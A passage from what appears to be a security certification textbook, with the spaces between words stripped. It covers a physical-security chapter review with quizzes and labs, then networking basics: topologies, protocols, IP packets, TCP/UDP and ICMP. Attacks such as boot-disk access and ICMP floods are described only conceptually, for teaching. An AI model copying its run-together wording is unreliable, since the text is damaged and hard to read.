Multiple-factorauthenticationmethodsgreatlyenhancesecuritybymakingitverydifficultforanattackertoobtainallthecorrectmaterialsforauthentication.Theyalsoprotectagainsttheriskofstolentokens,astheattackermusthavethecorrectbiometric,password,orboth.Moreimportant,multiple-factorauthenticationenhancesthesecurityofbiometricsystems,byprotectingagainstastolenbiometric.Changingthetokenmakesthebiometricuselessunlesstheattackercanstealthenewtoken.Italsoreducesfalsepositivesbytryingtomatchthesuppliedbiometricwiththeonethatisassociatedwiththesuppliedtoken.Thispreventsthecomputerfromseekingamatchusingtheentiredatabaseof
biometrics.Usingmultiplefactorsisoneofthebestwaystoensureproperauthenticationandaccesscontrol.
Chapter8Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingfactsabouthowphysicalsecurityimpactsnetworksecurity.
Describehowphysicalsecuritydirectlyaffectscomputerandnetworksecurity
Physicalaccessdefeatsallnetworksecurityprotections.
Bootdisksallowfilesystemaccess.
Driveimagingissimpletoaccomplishwithphysicalaccess.
Accesstotheinternalnetworkissimplewithphysicalaccess.
Theftofhardwarecanbeanattackinandofitself.
Discussstepsthatcanbetakentohelpmitigaterisks
Removaloffloppydrivesandothermediadriveswhentheyareunnecessarycanhelpmitigatebootdiskattacks.
RemovalofCD-ROMdevicesalsomakesphysicalaccessattacksmoredifficult.
BIOSpasswordsshouldbeusedtoprotectthebootsequence.
USBdevicesareathreatandthus,ifpossible,USBdriversshouldberemoved.
Allusersneedsecuritytraining.
Authenticationsystemsshouldusemultiplefactorswhenfeasible.
Identifythedifferenttypesoffiresandthevariousfiresuppressionsystemsdesignedtolimitthedamagecausedbyfires
Firescanbecausedbyandcanconsumeanumberofdifferentmaterials.Itisimportanttorecognizewhattypeoffireisoccurring,becausetheextinguishertousedependsonthetypeoffire.
TheABCfireextinguisheristhemostcommontypeandisdesignedtohandlemosttypesoffires.Theonlytypeoffireitisnotdesignedtoaddressisonewithcombustiblemetals.
Explainelectronicaccesscontrolsandtheprinciplesofconvergence
Accesscontrolsshouldhavelayeredareasandelectronicaccesscontrolsystems.
Electronicphysicalsecuritysystemsneedtobeprotectedfromnetwork-basedattacks.
KeyTermsaccesstokens(210)autoplay(201)biometrics(211)BIOSpasswords(200)bootdisk(192)closedcircuittelevision(CCTV)(198)contactlessaccesscards(197)convergence(200)crossovererrorrate(CER)(214)driveimaging(194)falsenegative(212)
falsepositive(212)layeredaccess(197)LiveCD(193)mantrap(198)multiple-factorauthentication(214)physicalaccesscontrol(196)policiesandprocedures(200)smartcards(211)UnifiedExtensibleFirmwareInterface(UEFI)(200)USBdevices(201)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Adoorsystemdesignedtoonlyallowasinglepersonthroughiscalleda(n)_______________.
2._______________includeMP3playersandflashdrives.3.A(n)_______________happenswhenanunauthorizeduseris
allowedaccess.
4.Removablemediafromwhichacomputercanbebootediscalleda(n)_______________.
5._______________forcesausertoauthenticateagainwhenenteringamoresecurearea.
6.Itemscarriedbytheusertoallowthemtobeauthenticatedarecalled_______________.
7._______________isthemeasurementofuniquebiologicalproperties,likethefingerprint.
8._______________preventanattackerfrommakingthemachinebootofftheDVDdrive.
9._______________isasystemwherethecameraandmonitoraredirectlylinked.
10.Usingatoken,fingerprintreader,andPINkeypadwouldbeanexampleof_______________.
Multiple-ChoiceQuiz1.Whatisthemostcommonexampleofanaccesstoken?
A.Smartcard
B.Handwritingsample
C.PDA
D.Key
2.Whichoneisnotcommonlyusedasabiometric?A.Eyeretina
B.Handgeometry
C.Shoulder-to-waistgeometry
D.Fingerprint
3.Probablythesimplestphysicalattackonthecomputersystemis:A.AccessinganEthernetjacktoattackthenetwork
B.Usinganimitationtofoolabiometricauthenticator
C.InstallingavirusontheCCTVsystem
D.Outrighttheftofthecomputers
4.Whatisacommonthreattotoken-basedaccesscontrols?
A.Thekey
B.Demagnetizationofthestrip
C.Asystemcrash
D.Lossortheftofthetoken
5.WhycanUSBflashdrivesbeathreat?A.Theyusetoomuchpower.
B.Theycanbringmaliciouscodepastothersecuritymechanisms.
C.Theycanbestolen.
D.Theycanbeencrypted.
6.WhyisHVACimportanttocomputersecurity?A.SabotageoftheACunitcouldtakeouttheelectricalpower.
B.SabotageoftheACunitwouldmakethecomputersoverheatandshutdown.
C.TheACunitscouldbeconnectedtothenetwork.
D.HVACisnotimportanttosecurity.
7.Whyshouldsecurityguardsgetcross-traininginnetworksecurity?A.Theyaretheeyesandearsofthecorporationwhenitcomesto
security.
B.Theyaretheonlypeopleinthebuildingatnight.
C.Theyaremorequalifiedtoknowwhatasecuritythreatis.
D.Theyhavetheauthoritytodetainviolators.
8.Whyisenrollmentimportanttobiometrics?A.Fingerprintsareunique.
B.Itaddsanotherlayertothelayeredaccessmodel.
C.Ifenrollmentisnotdonecarefully,falsepositiveswillincrease.
D.Itcompletelypreventsfalsepositives.
9.Whyisphysicalsecuritysoimportanttogoodnetworksecurity?A.Becauseencryptionisnotinvolved
B.Becausephysicalaccessdefeatsnearlyallnetworksecuritymeasures
C.Becauseanattackercanstealbiometricidentities
D.Authentication
10.Howdoesmultiple-factorauthenticationimprovesecurity?A.Byusingbiometrics,nootherpersoncanauthenticate.
B.Itrestrictsuserstosmallerspaces.
C.Byusingacombinationofauthentications,itismoredifficultforsomeonetogainillegitimateaccess.
D.Itdeniesaccesstoanintrudermultipletimes.
EssayQuestions1.YouhavebeenaskedtoreportonthefeasibilityofinstallinganIP
CCTVcamerasystematyourorganization.DetailtheprosandconsofanIPCCTVsystemandhowyouwouldimplementthesystem.
2.Writeamemojustifyinglayeredaccessfordevicesinanorganization.
3.Writeamemojustifyingmoreusereducationaboutphysicalsecurity.
4.WriteasamplepolicyregardingtheuseofUSBdevicesinan
organization.
LabProjects
•LabProject8.1LoadaLiveCDonyourmachineandexaminethetoolsitprovides.Youwillneedthefollowingmaterials:
AcomputerwithaversionofWindowsinstalledandaCD/DVDburner
AnemptyCDorDVDThendothefollowing:
1.DownloadacopyofKaliLinux.Agoodsitefromwhichtoobtainthisiswww.kali.org/downloads/.
2.BurntheISOfiletotheCD/DVD.
3.Rebootthemachine,allowingtheLiveCDtostartthemachineinLinux.4.OnceKaliLinuxisrunning,openaterminalwindowandtypewireshark.
5.WithWiresharkopenasasniffingprogram,recordthetraffictoandfromthiscomputer.A.OpenCapture|Options.
B.SelectStartonyourEthernetinterface,usuallyeth0.
C.StopCapturebyselectingCapture|Stop.
D.Clickanypacketlistedtoviewtheanalysis.
6.ViewtheothertoolsontheCDunderKDE|Kali.
•LabProject8.2Disableautoplayonyoursystemforseveraltypesofmedia.Youwillneedthefollowingmaterials:
AcomputerwithWindowsAUSBflashdrivethatissettobebootable
ACD/DVDwithanautoplayfile
Thendothefollowing:
1.InserttheCD/DVDandverifythatautoplayisonandworking.
2.Followthischapter’sinstructionsondisablingautoplay.3.ReinserttheCD/DVDandverifythatautoplayisdisabled—nothingshouldappearwhen
theCD/DVDisinsertednow.
4.InserttheUSBflashdriveandseeifautoplayworksforit;ifitdoes,disableitusingthesamemethod.
chapter9 NetworkFundamentals
Thevalueofacommunicationsnetworkisproportionaltothesquareofthenumberofitsusers.
—METCALFE’SLAW
B
Inthischapter,youwilllearnhowto
Identifythebasicnetworkarchitectures
Definethebasicnetworkprotocols
Explainroutingandaddresstranslation
Classifysecurityzones
ythesimplestdefinitioninthedataworld,anetworkisameanstoconnecttwoormorecomputerstogetherforthepurposesofsharinginformation.Theterm“network”hasdifferentmeaningsdependingon
thecontextandusage.Anetworkcanbeagroupoffriendsandassociates,aseriesofinterconnectedtunnels,or,fromacomputer-orientedperspective,acollectionofinterconnecteddevices.Networksizesandshapesvarydrastically,rangingfromtwopersonalcomputersconnectedwithacrossovercableorwirelessrouterallthewayuptotheInternet,encirclingtheglobeandlinkingtogetheruntoldnumbersofindividual,distributedsystems.Thoughdatanetworksvarywidelyinsizeandscope,theyaregenerallydefinedintermsoftheirarchitecture,topology,andprotocols.
NetworkArchitecturesEverynetworkhasanarchitecture—whetherbydesignorbyaccident.Definingordescribingaspecificnetwork’sarchitectureinvolvesidentifyingthenetwork’sphysicalconfiguration,logicaloperation,structure,procedures,dataformats,protocols,andothercomponents.Forthesakeofsimplicityandcategorization,peopletendtodividenetworkarchitecturesintotwomaincategories:LANsandWANs.Alocalareanetwork(LAN)typicallyissmallerintermsofsizeandgeographiccoverageandconsistsoftwoormoreconnecteddevices.HomenetworksandmostsmallofficenetworkscanbeclassifiedasLANs.Awidearea
network(WAN)tendstobelarger,coveringmoregeographicarea,andconsistsoftwoormoresystemsingeographicallyseparatedareasconnectedbyanyofavarietyofmethodssuchasleasedlines,radiowaves,satelliterelays,microwaves,orevendial-upconnections.Withtheadventofwirelessnetworking,optical,andcellulartechnology,thelinesbetweenLANandWANsometimesseemtomergeseamlesslyintoasinglenetworkentity.Forexample,mostcorporationshavemultipleLANswithineachofficelocationthatallconnecttoaWANthatprovidesintercompanyconnectivity.Figure9.1showsanexampleofacorporatenetwork.EachofficelocationwilltypicallyhaveoneormoreLANs,whichareconnectedtotheotherofficesandthecompanyheadquartersthroughacorporateWAN.
•Figure9.1CorporateWANconnectingmultipleoffices
ExamTip:ALANisalocalareanetwork—anofficebuilding,homenetwork,andsoon.AWANisawideareanetwork—acorporatenetworkconnectingofficesinDallas,NewYork,andSanJose,forexample.
Overtime,asnetworkshavegrown,diversified,andmultiplied,thelinebetweenLANandWANhasbecomeblurred.Tobetterdescribeemerging,specializednetworkstructures,newtermshavebeencoinedtoclassifynetworksbasedonsizeanduse:
Campusareanetwork(CAN)Anetworkconnectinganynumberofbuildingsinanofficeoruniversitycomplex(alsoreferredtoasacampuswideareanetwork).
IntranetA“private”networkthatisaccessibleonlytoauthorizedusers.Manylargecorporationshostanintranettofacilitateinformationsharingwithintheirorganization.
InternetThe“globalnetwork”connectinghundredsofmillionsofsystemsandusers.
Metropolitanareanetwork(MAN)Anetworkdesignedforaspecificgeographiclocalitysuchasatownoracity.
Storageareanetwork(SAN)Ahigh-speednetworkconnectingavarietyofstoragedevicessuchastapesystems,RAIDarrays,opticaldrives,fileservers,andothers.
Virtuallocalareanetwork(VLAN)Alogicalnetworkallowingsystemsondifferentphysicalnetworkstointeractasiftheywereconnectedtothesamephysicalnetwork.
Client/serverAnetworkinwhichpowerful,dedicatedsystemscalledserversprovideresourcestoindividualworkstationsorclients.
Peer-to-peerAnetworkinwhicheverysystemistreatedasanequal,suchasahomenetwork.
NetworkTopologyOnemajorcomponentofeverynetwork’sarchitectureisthenetwork’stopology—howthenetworkisphysicallyorlogicallyarranged.Termstoclassifyanetwork’stopologyhavebeendeveloped,oftenreflectingthephysicallayoutofthenetwork.Themainclassesofnetworktopologiesarestar,ring,bus,andmixed.
StartopologyNetworkcomponentsareconnectedtoacentralpoint.(SeeFigure9.2.)
•Figure9.2Startopology
BustopologyNetworkcomponentsareconnectedtothesamecable,oftencalled“thebus”or“thebackbone.”(SeeFigure9.3.)
•Figure9.3Bustopology
RingtopologyNetworkcomponentsareconnectedtoeachotherinaclosedloopwitheachdevicedirectlyconnectedtotwootherdevices.(SeeFigure9.4.)
•Figure9.4Ringtopology
Largernetworks,suchasthoseinsideanofficecomplex,mayusemorethanonetopologyatthesametime.Forexample,anofficecomplexmayhavealargeringtopologythatinterconnectsallthebuildingsinthecomplex.Eachbuildingmayhavealargebustopologytointerconnectstartopologieslocatedoneachfloorofthebuilding.Thisiscalledamixedtopologyorhybridtopology.(SeeFigure9.5.)
•Figure9.5Mixedtopology
Withrecentadvancesintechnology,thesetopologydefinitionsoftenbreakdown.Whileanetworkconsistingoffivecomputersconnectedtothesamecoaxialcableiseasilyclassifiedasabustopology,whataboutthosesamecomputersconnectedtoaswitchusingCat-5cables?Withaswitch,eachcomputerisconnectedtoacentralnode,muchlikeastartopology,butthebackplaneoftheswitchisessentiallyasharedmedium.
Withaswitch,eachcomputerhasitsownexclusiveconnectiontotheswitchlikeastartopology,buthastosharetheswitch’scommunicationsbackbonewithalltheothercomputers,muchlikeabustopology.Toavoidthistypeofconfusion,manypeopleusetopologydefinitionsonlytoidentifythephysicallayoutofthenetwork,focusingonhowthedevicesareconnectedtothenetwork.Ifweapplythislineofthinkingtoourexample,thefive-computernetworkbecomesastartopologywhetherweuseahuboraswitch.
Wirelessnetworksuseradiowavesastheirmediumtotransmitpackets,andthoseradiowavesdon’tstopatthewallsofyourhouseoryourorganization.Anyonewithinrangecan“see”thoseradiowavesandattempttoeithersniffyourtrafficorconnecttoyournetwork.Encryption,MACaddressfiltering,andsuppressionofbeaconframesareallsecuritymechanismstoconsiderwhenusingwirelessnetworks.Wirelessnetworks,becauseofthesignalpropagation,caneasilyassumeameshstructure.
NetworkProtocolsHowdoalltheseinterconnecteddevicescommunicate?WhatmakesaPCinChinaabletoviewwebpagesonaserverinBrazil?Whenengineersfirststartedtoconnectcomputerstogethervianetworks,theyquicklyrealizedtheyneededacommonlyacceptedmethodforcommunicating—aprotocol.
ProtocolsAprotocolisanagreed-uponformatforexchangingortransmittingdatabetweensystems.Aprotocoldefinesanumberofagreed-uponparameters,suchasthedatacompressionmethod,thetypeoferrorcheckingtouse,andmechanismsforsystemstosignalwhentheyhavefinishedeitherreceivingortransmittingdata.Thereisawidevarietyofprotocols,each
designedwithcertainbenefitsandusesinmind.Someofthemorecommonprotocolsthathavebeenusedinnetworkingarelistednext.Today,mostnetworksaredominatedbyEthernetandInternetProtocol.
AppleTalkThecommunicationsprotocoldevelopedbyAppletoconnectMacintoshcomputersandprinters.
AsynchronousTransferMode(ATM)Aprotocolbasedontransferringdatainfixed-sizepackets.Thefixedpacketsizeshelpensurethatnosingledatatypemonopolizestheavailablebandwidth.
EthernetTheLANprotocoldevelopedjointlybyXerox,DEC,andIntel—themostwidelyimplementedLANstandard.
FiberDistributedDataInterface(FDDI)Theprotocolforsendingdigitaldataoverfiber-opticcabling.
InternetProtocols(IP)Theprotocolsformanagingandtransmittingdatabetweenpacket-switchedcomputernetworks,originallydevelopedfortheDepartmentofDefense.MostusersarefamiliarwithInternetprotocolssuchase-mail,FileTransferProtocol(FTP),Telnet,andHypertextTransferProtocol(HTTP).
InternetworkPacketExchange(IPX)ThenetworkingprotocolcreatedbyNovellforusewithNovellNetWareoperatingsystems.
SignalingSystem7(SS7)Thetelecommunicationsprotocolusedbetweenprivatebranchexchanges(PBXs)tohandletaskssuchascallsetup,routing,andteardown.
SystemsNetworkArchitecture(SNA)AsetofnetworkprotocolsdevelopedbyIBM,originallyusedtoconnectIBM’smainframesystems.
TokenRingALANprotocoldevelopedbyIBMthatrequiressystemstopossessthenetwork“token”beforetransmittingdata.
TransmissionControlProtocol/InternetProtocol(TCP/IP)Thecollectionofcommunicationsprotocolsusedtoconnecthostsonthe
Internet.TCP/IPisbyfarthemostcommonlyusednetworkprotocolandisacombinationoftheTCPandIPprotocols.
X.25AprotocolDevelopedbytheComitéConsultatifInternationalTéléphoniqueetTélégraphique(CCITT)foruseinpacket-switchednetworks.TheCCITTwasasubgroupwithintheInternationalTelecommunicationUnion(ITU)beforetheCCITTwasdisbandedin1992.
AlittlehistoryontheIPprotocolfromWikipedia:“InMay,1974,theInstituteofElectricalandElectronicEngineers(IEEE)publishedapaperentitled‘AProtocolforPacketNetworkInterconnection.’Thepaper’sauthors,VintCerfandBobKahn,describedaninternetworkingprotocolforsharingresourcesusingpacket-switchingamongthenodes.”
Inmostcases,communicationsprotocolsweredevelopedaroundtheOpenSystemInterconnection(OSI)model.TheOSImodel,orOSIReferenceModel,isanInternationalOrganizationforStandardization(ISO)standardforworldwidecommunicationsthatdefinesaframeworkforimplementingprotocolsandnetworkingcomponentsinsevendistinctlayers.WithintheOSImodel,controlispassedfromonelayertoanother(top-down)beforeitexitsonesystemandentersanothersystem,wherecontrolispassedbottom-uptocompletethecommunicationscycle.ItisimportanttonotethatmostprotocolsonlylooselyfollowtheOSImodel;severalprotocolscombineoneormorelayersintoasinglefunction.TheOSImodelalsoprovidesacertainlevelofabstractionandisolationforeachlayer,whichonlyneedstoknowhowtointeractwiththelayeraboveandbelowit.Theapplicationlayer,forexample,onlyneedstoknowhowtocommunicatewiththepresentationlayer—itdoesnotneedtotalkdirectlytothephysicallayer.Figure9.6showsthedifferentlayersoftheOSImodel.
•Figure9.6TheOSIReferenceModel
PacketsNetworksarebuilttoshareinformationandresources,butlikeotherformsofcommunication,networksandtheprotocolstheyusehavelimitsandrulesthatmustbefollowedforeffectivecommunication.Forexample,largechunksofdatamusttypicallybebrokenupintosmaller,moremanageablechunksbeforetheyaretransmittedfromonecomputertoanother.Breakingthedatauphasadvantages—youcanmoreeffectivelysharebandwidthwithothersystemsandyoudon’thavetoretransmittheentiredatasetifthereisaproblemintransmission.Whendataisbrokenupintosmallerpiecesfortransmission,eachofthesmallerpiecesistypicallycalledapacket.Eachprotocolhasitsowndefinitionofapacket—
dictatinghowmuchdatacanbecarried,whatinformationisstoredwhere,howthepacketshouldbeinterpretedbyanothersystem,andsoon.
Theconceptofbreakingamessageintopiecesbeforesendingitisasoldasnetworking.Thetermsusedtodescribethesepiecescanvaryfromprotocoltoprotocol.FrameRelayandEthernetbothusethetermframe.ATMcallsthemcells.Manyprotocolsusethegenerictermpacket.IntheOSImodel,thetermdatagramisused.Attheendoftheday,regardlessofwhatitiscalled,thesepiecesareprotocol-defined,formattedstructuresusedtocarryinformation.
Astandardpacketstructureisacrucialelementinaprotocoldefinition.Withoutastandardpacketstructure,systemswouldnotbeabletointerprettheinformationcomingtothemfromothersystems.Packet-basedcommunicationsystemshaveotheruniquecharacteristics,suchassize,whichneedtobeaddressed.Thisisdoneviaadefinedmaximumandfragmentingpacketsthataretoobig,asshowninthenextsections.
MaximumTransmissionUnitWhentransmittingpacketsacrossanetwork,therearemanyinterveningprotocolsandpiecesofequipment,eachwithitsownsetoflimitations.OneofthefactorsusedtodeterminehowmanypacketsamessagemustbebrokenintoistheMaximumTransmissionUnit(MTU).TheMTUisthelargestpacketthatcanbecarriedacrossanetworkchannel.ThevalueoftheMTUisusedbyTCPtopreventpacketfragmentationatinterveningdevices.PacketfragmentationisthesplittingofapacketwhileintransitintotwopacketssothattheyfitpastanMTUbottleneck.
PacketFragmentationBuiltintotheInternetProtocolisamechanismforhandlingofpacketsthatarelargerthanallowedacrossahop.UnderICMPv4,arouterhastwooptionswhenitencountersapacketthatistoolargeforthenexthop:breakthepacketintotwofragments,sendingeachseparately,ordropthepacket
andsendanICMPmessagebacktotheoriginator,indicatingthatthepacketistoobig.Whenafragmentedpacketarrivesatthereceivinghost,itmustbereunitedwiththeotherpacketfragmentsandreassembled.OneoftheproblemswithfragmentationisthatitcancauseexcessivelevelsofpacketretransmissionasTCPmustretransmitanentirepacketforthelossofasinglefragment.InIPv6,toavoidfragmentation,hostsarerequiredtodeterminetheminimalpathMTUbeforetransmissionofpacketstoavoidfragmentationenroute.AnyfragmentationrequirementsinIPv6areresolvedattheorigin,andiffragmentationisrequired,itoccursbeforesending.
TechTip
IPv6andFragmentationIPv6systemscalculatetheMTUandthenadheretothatfromhosttohost.Thispreventsfragmentationenroute;insteadallfragmentationisdonebytheoriginatinghosttofitundertheMTUlimit.
IPfragmentationcanbeexploitedinavarietyofwaystobypasssecuritymeasures.PacketscanbepurposefullyconstructedtosplitexploitcodeintomultiplefragmentstoavoidIDSdetection.Becausethereassemblyoffragmentsisdependentupondatainthefragments,itispossibletomanipulatethefragmentstoresultindatagramsthatexceedthe64KBlimit,resultingindenialofservice.
InternetProtocolTheInternetProtocolisnotasingleprotocolbutasuiteofprotocols.TherelationshipbetweensomeoftheIPsuiteandtheOSImodelisshowninFigure9.7.Asyoucansee,therearedifferencesbetweenthetwoversionsoftheprotocolinuse,v4andv6.Theprotocolelementsandtheirsecurityimplicationsarecoveredinthenextsectionsofthischapter.Oneofthese
differencesisthereplacementoftheInternetGroupManagementProtocol(IGMP)withtheInternetControlMessageProtocol(ICMP)andMulticastListenerDiscovery(MLD)inIPv6.
•Figure9.7InternetProtocolsuitecomponents
IPPacketsTobetterunderstandpacketstructure,let’sexaminethepacketstructuredefinedbytheIPprotocol.AnIPpacket,oftencalledadatagram,hastwomainsections:theheaderandthedatasection(sometimescalledthepayload).Theheadersectioncontainsalloftheinformationneededtodescribethepacket(seeFigure9.8).
•Figure9.8LogicallayoutofanIPpacket,(a)IPv4(b)IPv6
InIPv4,therearecommonfieldstodescribethefollowingoptions.
Whatkindofpacketitis(protocolversionnumber)
Howlargetheheaderofthepacketis(packetheaderlength)
Howtoprocessthispacket(typeofservicetellingthenetworkwhetherornottouseoptionssuchasminimizedelay,maximizethroughput,maximizereliability,andminimizecost)
Howlargetheentirepacketis(overalllengthofpacket—sincethisisa16-bitfield,themaximumsizeofanIPpacketis65,535bytes,butinpracticemostpacketsarearound1500bytes)
Auniqueidentifiersothatthispacketcanbedistinguishedfromotherpackets
Whetherornotthispacketispartofalongerdatastreamandshouldbehandledrelativetootherpackets
Flagsthatindicatewhetherornotspecialhandlingofthispacketisnecessary
Adescriptionofwherethispacketfitsintothedatastreamascomparedtootherpackets(thefragmentoffset)
A“timetolive”fieldthatindicatesthepacketshouldbediscardedifthevalueiszero
Aprotocolfieldthatdescribestheencapsulatedprotocol
Achecksumofthepacketheader(tominimizethepotentialfordatacorruptionduringtransmission)
Wherethepacketisfrom(sourceIPaddress,suchas10.10.10.5)
Wherethepacketisgoing(destinationIPaddress,suchas10.10.10.10)
Optionflagsthatgovernsecurityandhandlingrestrictions,whetherornottorecordtheroutethispackethastaken,whetherornottorecordtimestamps,andsoon
Thedatathispacketcarries
InIPv6,thesourceanddestinationaddressestakeupmuchgreater
room,andforequipmentandpackethandlingreasons,mostoftheinformationaloptionshavebeenmovedtotheoptionalareaaftertheaddresses.Thisseriesofoptionalextensionheadersallowstheefficientuseoftheheaderinprocessingtheroutinginformationduringpacketroutingoperations.OneofthemostcommonoptionsistheIPsecextension,whichisused
toestablishIPsecconnections.IPsecusesencryptiontoprovideavarietyofprotectionstopackets.IPsecisfullycoveredinChapter11.
TechTip
TheImportanceofUnderstandingTCP/IPProtocolsAsecurityprofessionalmustunderstandhowthevariousTCP/IPprotocolsoperate.Forexample,ifyou’relookingatapacketcaptureofasuspectedportscan,youneedtoknowhow“normal”TCPandUDPtrafficworkssoyouwillbeabletospot“abnormal”traffic.Thischapterprovidesaverybasicoverviewofthemostpopularprotocols:TCP,UDP,andICMP.
Asyoucansee,thisstandardpacketdefinitionallowssystemstocommunicate.Withoutthistypeof“commonlanguage,”theglobalconnectivityweenjoytodaywouldbeimpossible—theIPprotocolistheprimarymeansfortransmittinginformationacrosstheInternet.
TCPvs.UDPProtocolsaretypicallydevelopedtoenableacertaintypeofcommunicationorsolveaspecificproblem.Overtheyears,thisapproachhasledtothedevelopmentofmanydifferentprotocols,eachcriticaltothefunctionorprocessitsupports.However,therearetwoprotocolsthathavegrownsomuchinpopularityandusethatwithoutthem,theInternetasweknowitwouldceasetoexist.Thesetwoprotocols,theTransmissionControlProtocol(TCP)andUserDatagramProtocol(UDP),areprotocolsthatrunontopoftheIPnetworkprotocol.Asseparateprotocols,
theyeachhavetheirownpacketdefinitions,capabilities,andadvantages,butthemostimportantdifferencebetweenTCPandUDPistheconceptof“guaranteed”reliabilityanddelivery.
ExamTip:TCPisa“connection-oriented”protocolandoffersreliabilityandguaranteeddeliveryofpackets.UDPisa“connectionless”protocolwithnoguaranteesofdelivery.
UDPisknownasa“connectionless”protocolasithasveryfewerror-recoveryservicesandnoguaranteeofpacketdelivery.WithUDP,packetsarecreatedandsentontheirway.Thesenderhasnoideawhetherthepacketsweresuccessfullyreceivedorwhethertheywerereceivedinorder.Inthatrespect,UDPpacketsaremuchlikepostcards—youaddressthemanddroptheminthemailbox,notreallyknowingif,when,orhowthepostcardsreachyourintendedaudience.Eventhoughpacketlossandcorruptionarerelativelyrareonmodernnetworks,UDPisconsideredtobeanunreliableprotocolandisoftenonlyusedfornetworkservicesthatarenotgreatlyaffectedbytheoccasionallostordroppedpacket.Timesynchronizationrequests,namelookups,andstreamingaudioaregoodexamplesofnetworkservicesbasedonUDP.UDPalsohappenstobeafairly“efficient”protocolintermsofcontentdeliveryversusoverhead.WithUDP,moretimeandspaceisdedicatedtocontent(data)deliverythanwithotherprotocolssuchasTCP.ThismakesUDPagoodcandidateforstreamingprotocols,asmoreoftheavailablebandwidthandresourcesareusedfordatadeliverythanwithotherprotocols.TCPisa“connection-oriented”protocolandwasspecificallydesigned
toprovideareliableconnectionbetweentwohostsexchangingdata.TCPwasalsodesignedtoensurethatpacketsareprocessedinthesameorderinwhichtheyweresent.AspartofTCP,eachpackethasasequencenumbertoshowwherethatpacketfitsintotheoverallconversation.Withthesequencenumbers,packetscanarriveinanyorderandatdifferenttimesandthereceivingsystemwillstillknowthecorrectorderforprocessing
them.Thesequencenumbersalsoletthereceivingsystemknowifpacketsaremissing—receivingpackets1,2,4,and7tellsusthatpackets3,5,and6aremissingandneededaspartofthisconversation.Thereceivingsystemcanthenrequestretransmissionofpacketsfromthesendertofillinanygaps.The“guaranteedandreliable”aspectofTCPmakesitverypopularfor
manynetworkapplicationsandservicessuchasHTTP,FTP,andTelnet.Aspartoftheconnection,TCPrequiresthatsystemsfollowaspecificpatternwhenestablishingcommunications.Thispattern,oftencalledthethree-wayhandshake(showninFigure9.9),isasequenceofveryspecificsteps:
•Figure9.9TCP’sthree-wayhandshake
1.Theoriginatinghost(usuallycalledtheclient)sendsaSYN(synchronize)packettothedestinationhost(usuallycalledtheserver).TheSYNpackettellstheserverwhatporttheclientwantstoconnecttoandtheinitialpacketsequencenumberoftheclient.
2.TheserversendsaSYN/ACKpacketbacktotheclient.ThisSYN/ACK(synchronize/acknowledge)tellstheclient“Ireceivedyourrequest”andalsocontainstheserver’sinitialpacketsequencenumber.
3.TheclientrespondstotheserverwithanACKpackettocompletetheconnectionestablishmentprocess.
Thinkofthethree-wayhandshakeasbeingsimilartoaphonecall.Youplaceacalltoyourfriend—that’stheSYN.Yourfriendanswersthephoneandsays“hello”—that’stheSYN/ACK.Thenyousay“Hi,it’sme”—that’stheACK.Yourconnectionisestablishedandyoucanstartyourconversation.
ICMPWhileTCPandUDParearguablythemostcommonprotocols,theInternetControlMessageProtocol(ICMP)isprobablythethirdmostcommonlyusedprotocol.Duringtheearlydevelopmentoflargenetworks,itwasquicklydiscoveredthatthereneededtobesomemechanismformanagingtheoverallinfrastructure—handlingconnectionstatus,trafficflow,availability,anderrors.ThismechanismisICMP.ICMPisacontrolandinformationprotocolandisusedbynetworkdevicestodeterminesuchthingsasaremotenetwork’savailability,thelengthoftimetoreacharemotenetwork,andthebestrouteforpacketstotakewhentravelingtothatremotenetwork(usingICMPredirectmessages,forexample).ICMPcanalsobeusedtohandletheflowoftraffic,tellingothernetworkdevicesto“slowdown”transmissionspeedsifpacketsarecomingintoofast.
TechTip
TCPPacketFlagsTCPpacketscontainflags—dedicatedfieldsthatareusedtohelptheTCPprotocolcontrolandmanagetheTCPsession.ThereareeightdifferentflagsinaTCPpacket,andwhenaflagis“set,”itissettoavalueof1.Theeightdifferentflagsare
CWR(CongestionWindowReduced)SetbyahosttoindicatethatitreceivedapacketwiththeECEflagsetandistakingactiontohelpreducecongestion.
ECE(ECN-Echo)IndicatesthattheTCPpeerisECNcapablewhenusedduringthethree-wayhandshake.Duringnormaltraffic,thisflagmeansthatapacketwithaCongestionExperiencedflaginitsIPheaderwasreceivedbythehostsendingthis
packet.
URG(Urgent)Whenset,theurgentpointerinthepacketsshouldbereadasvalidandfollowedforadditionaldata.
ACK(Acknowledgment)IndicatesthatthedataintheACKfieldshouldbeprocessed.
PSH(Push)Indicatesthatdatadeliveryshouldstartimmediatelyratherthanwaitingforbufferstofillupfirst.
RST(Reset)Resetsthecurrentconnection—astart-overfeatureoftenusedbyIPS/IDSdevicestointerruptsessions.
SYN(Synchronize)Usedtohelpsynchronizesequencenumbers.FIN(Finish)Indicatesthesenderisfinishedandhasnomoredatatosend.
ICMP,likeUDP,isaconnectionlessprotocol.ICMPwasdesignedtocarrysmallmessagesquicklywithminimaloverheadorimpacttobandwidth.ICMPpacketsaresentusingthesameheaderstructureasIPpackets,withtheprotocolfieldsetto1toindicatethatitisanICMPpacket.ICMPpacketsalsohavetheirownheader,whichfollowstheIPheaderandcontainstype,code,checksum,sequencenumber,identifier,anddatafields.The“type”fieldindicateswhattypeofICMPmessageitis,andthe“code”fieldtellsuswhatthemessagereallymeans.Forexample,anICMPpacketwithatypeof3andacodeof2wouldtellusthisisa“destinationunreachable”messageand,morespecifically,a“hostunreachable”message—usuallyindicatingthatweareunabletocommunicatewiththeintendeddestination.BecauseICMPmessagesinIPv6canuseIPsec,ICMPv6messagescanhavesignificantprotectionsfromalteration.Unfortunately,ICMPhasbeengreatlyabusedbyattackersoverthelast
fewyearstoexecutedenial-of-service(DoS)attacks.BecauseICMPpacketsareverysmallandconnectionless,thousandsandthousandsofICMPpacketscanbegeneratedbyasinglesysteminaveryshortperiodoftime.AttackershavedevelopedmethodstotrickmanysystemsintogeneratingthousandsofICMPpacketswithacommondestination—theattacker’starget.Thiscreatesaliteralfloodoftrafficthatthetarget,andinmostcasesthenetworkthetargetsitson,isincapableofdealingwith.The
ICMPflooddrownsoutanyotherlegitimatetrafficandpreventsthetargetfromaccomplishingitsnormalduties—denyingaccesstotheservicethetargetnormallyprovides.ThishasledtomanyorganizationsblockingallexternalICMPtrafficattheperimeteroftheirorganization.
TechTip
